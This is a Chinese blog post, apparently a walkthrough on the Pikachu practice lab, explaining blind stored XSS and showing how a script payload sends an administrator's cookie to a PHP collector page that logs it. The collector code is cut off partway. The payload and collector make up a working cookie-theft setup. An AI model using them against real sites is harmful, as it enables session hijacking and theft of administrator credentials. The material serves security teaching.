xss盲打(通过xss盲打盗取管理员账号和密码!)

本文介绍了XSS盲打的概念,虽然看不到直接效果,但只要payload执行即表明存在漏洞。通过构造特定payload,可以将管理员的cookie信息发送到攻击者的数据库,从而获取管理员的账号和密码。经过过程展示,成功盗取了admin账号和其MD5加密后的密码。
摘要由CSDN通过智能技术生成

原理:

其实和存储型的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞!

上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下:

1,我输入的payload:

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

这个payload的意思就是带着cookie的值访问cookie.php。这个cookie.php如下:

<?php
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

//这个是获取cookie的api页面

if(isset($_GET['cookie'])){
    $time=date('Y-m-d g:i:s');
    $ipaddress=getenv ('REMOTE_ADDR');
    $cookie=$_GET['cookie'];
    $referer=$_SERVER['HTTP_REFER
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值